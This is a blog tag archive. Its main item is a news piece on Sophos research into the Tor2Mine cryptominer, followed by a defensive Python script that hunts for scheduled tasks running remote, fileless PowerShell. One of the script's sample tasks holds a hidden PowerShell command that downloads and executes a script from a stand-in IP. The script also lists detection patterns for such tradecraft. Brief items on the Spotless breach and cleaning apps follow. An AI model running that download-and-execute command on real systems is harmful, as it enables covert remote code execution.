Tag Archive for: Cleaning

Tor2Mine cryptominer has evolved: Just patching and cleaning the system won’t help


Sophos has released new findings on the Tor2Mine cryptominer that show how the miner evades detection, spreads automatically through a target network and is becoming harder to remove from an infected system. Tor2Mine is a Monero miner that has been active for at least two years.

Tor2Mine cryptominer

In the research, Sophos describes new variants of the miner that include a PowerShell script which attempts to disable malware protection, execute the miner payload and steal Windows administrator credentials. What happens next depends on whether the attackers manage to gain administrative privileges with the stolen credentials; this first stage is the same for all the variants analyzed.

If the attackers obtain administrative credentials, they have the privileged access they need to install the mining files. They can also search the network for other machines on which to install them, which is how Tor2Mine spreads and embeds itself on computers across the network.

Tor2Mine cryptominer can execute the miner remotely and filelessly

If the attackers cannot gain administrative privileges, Tor2Mine can still execute the miner remotely and filelessly through commands that are run as scheduled tasks. In that case the mining software is hosted on a remote server rather than written to disk on the compromised machine, so there is no miner binary on the host for a file scan to find.

All the variants attempt to shut down anti-malware protection and install the same miner code. Likewise, in every case the miner keeps re-infecting systems on the network until it is blocked by malware protection or completely eradicated from the network.
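The scheduled-task technique described above is something a responder can hunt for directly, because the task definition has to exist on the host even when the miner itself does not. The following script is an added example written for this page, not code from Sophos or from the Tor2Mine research: it parses scheduled-task XML (the format that `schtasks /query /xml /tn <name>` or the PowerShell Export-ScheduledTask cmdlet produces) and flags actions whose arguments contain a remote URL, a download primitive, Invoke-Expression, an encoded command or a hidden-window or execution-policy switch, noting whether the launched binary is a known script host. The three tasks, their names and the 198.51.100.7 address are constructed for the example; the indicator list is generic living-off-the-land tradecraft, not indicators taken from the Sophos report.

```python
"""Hunt for scheduled tasks whose action looks like remote, fileless script execution.

Input is the task XML that `schtasks /query /xml /tn <name>` or Export-ScheduledTask
produces. The three tasks below are constructed for this example; the indicator
list is generic living-off-the-land tradecraft, not indicators from the Sophos report.
"""
import base64
import re
import xml.etree.ElementTree as ET

# Namespace of the Task Scheduler XML schema.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Interpreters and proxies commonly used to run a payload that never touches disk.
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd", "mshta", "wscript", "cscript",
                "regsvr32", "rundll32")

# (regex, label) pairs matched case-insensitively against the action's arguments.
INDICATORS = [
    (r"https?://", "remote URL in arguments"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b",
     "download primitive"),
    (r"invoke-expression|\biex\b", "Invoke-Expression"),
    (r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"-nop\b|-noprofile|-w(?:indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass",
     "evasion switch"),
]

def decode_encoded_command(arguments: str):
    """Return the plaintext of a -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", arguments, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_task(task_xml):
    """Return one finding per <Exec> action whose arguments match an indicator.
    task_xml may be str or bytes; pass the raw bytes of a real export so the
    UTF-16 declaration that Windows writes is honoured by the parser."""
    root = ET.fromstring(task_xml)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="(no URI)", namespaces=NS)
    findings = []
    for action in root.findall("t:Actions/t:Exec", NS):
        command = action.findtext("t:Command", default="", namespaces=NS).strip()
        arguments = action.findtext("t:Arguments", default="", namespaces=NS).strip()
        reasons = [label for pattern, label in INDICATORS
                   if re.search(pattern, arguments, re.IGNORECASE)]
        if not reasons:
            continue
        exe = command.replace("\\", "/").rsplit("/", 1)[-1].lower()
        findings.append({
            "task": uri,
            "command": command,
            "arguments": arguments,
            "reasons": reasons,
            # A known script host plus an indicator is the high-confidence combination.
            "script_host": exe.startswith(SCRIPT_HOSTS),
            "decoded": decode_encoded_command(arguments),
        })
    return findings

# Constructed sample 1: hidden PowerShell that fetches and evaluates a remote script.
REMOTE_SCRIPT_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Updater</URI></RegistrationInfo>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed sample 2: encoded command under a Microsoft-looking task path.
# The payload is just Write-Host so that the decode is verifiable.
ENCODED = base64.b64encode("Write-Host hi".encode("utf-16le")).decode()
ENCODED_TASK = f"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Microsoft\\Windows\\Maintenance\\Cache</URI></RegistrationInfo>
  <Actions Context="Author"><Exec>
    <Command>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Command>
    <Arguments>-NoP -W Hidden -Enc {ENCODED}</Arguments>
  </Exec></Actions>
</Task>"""

# Constructed sample 3: a benign built-in task, for contrast.
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Microsoft\\Windows\\Defrag\\ScheduledDefrag</URI></RegistrationInfo>
  <Actions Context="Author"><Exec>
    <Command>%windir%\\system32\\defrag.exe</Command>
    <Arguments>-c -h -o -$</Arguments>
  </Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for task in (REMOTE_SCRIPT_TASK, ENCODED_TASK, BENIGN_TASK):
        for f in analyze_task(task):
            print(f"{f['task']}: {f['command']} {f['arguments']}")
            print("  reasons:", ", ".join(f["reasons"]), "| script host:", f["script_host"],
                  "| decoded:", f["decoded"])
```

On a live host, export each task with Export-ScheduledTask (or `schtasks /query /xml /tn`) and feed the raw bytes to `analyze_task`. Because the miner re-registers its tasks from other infected machines, run the check across every host in the network rather than only the one that first alerted, and treat a hit as a prompt to look for the credential-theft and lateral-movement activity described above rather than as the whole infection.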

“The presence of miners, like Tor2Mine, in a network is almost always a harbinger of other, potentially more dangerous intrusions. However, Tor2Mine is much more aggressive than other miners,” said Sean Gallagher, senior threat researcher at Sophos.

“Once it has established a foothold on a network, it is difficult to root out without the assistance of endpoint protection software and other anti-malware measures. Because it spreads laterally away from the initial point of compromise, it can’t be eliminated just by patching and cleaning one system. The miner will continually attempt…

Source…

Major data breach at cleaning and catering company Spotless


Trans-Tasman catering and cleaning firm Spotless has admitted to a major data breach in which hackers may have obtained past and present staff members' passport and IRD numbers, among other personal information.

Internet experts said the breach was very serious and that the potential leak contained enough personal information to create a "very high risk" of identity theft.

Spotless told affected workers by email on Thursday.

One woman who received the email said she was deeply worried and had immediately visited her bank to change her credit cards. She was concerned that her passport was compromised, and also that Spotless' lower-waged cleaning staff, many of whom have English as a second language and perhaps poor access to email, would not necessarily receive the communication.

Netsafe chief executive Martin Cocker said the amount of data involved suggested the hackers had got into the company’s HR files. He said there was a risk of criminals using that data to apply for credit and services using people’s identities.

“There is a high risk to the subjects of the attack of future identity theft,” Cocker said. “If they have taken that much personal data, it is pretty high risk to the individual, so we would suggest people go through a process of trying to reduce that risk.”

Internet law expert Rick Shera said it definitely qualified as a privacy breach, “and given the type of information involved and the number of people involved it would be classed a serious breach, there wouldn’t be any doubt about that.”

Shera said it depended on whether the data had been encrypted or whether it had been stolen, but "that level of information is clearly information that could be used by someone to impersonate an individual".

He said taking passport and IRD numbers was “pretty serious” and could even conceivably allow a hacker to secure a RealMe account, the internet ID used to deal…

Source…

New Android Cleaning App Pulls Dirty Tricks to Grab Admin Rights – Security Intelligence (blog)


While games remain the top category across both Android and iOS, there's a growing focus on security. Users are concerned about the threat posed by third-party apps, malicious emails and mobile ransomware. So it's no surprise that a new threat known as …


Cleaning Unnecessary Files from Computer – Associated Content

Remove these programs with software tools such as Revo Uninstaller. Download your desired software after deleting the unwanted programs. Delete the surplus security programs. Some pre-installed security …
Read more